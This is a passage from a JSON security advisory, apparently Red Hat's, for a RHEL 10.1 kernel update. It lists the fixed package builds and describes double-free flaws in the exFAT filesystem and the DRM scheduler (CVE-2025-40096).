"NFV-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: Kernel: Double free vulnerability in exFAT filesystem can lead to denial of service"
},
{
"cve": "CVE-2025-40096",
"cwe": {
"id": "CWE-415",
"name": "Double Free"
},
"discovery_date": "2025-10-30T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407333"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the kernel subsystem handling of the DRM scheduler. Under certain error conditions, the function drm_sched_job_add_dependency() consumes a fence reference and then later erroneously attempts to free it again (double free). This may lead to memory corruption and, in some configurations, escalation of privileges.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: drm/sched: Fix potential double free in drm_sched_job_add_resv_dependencies",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
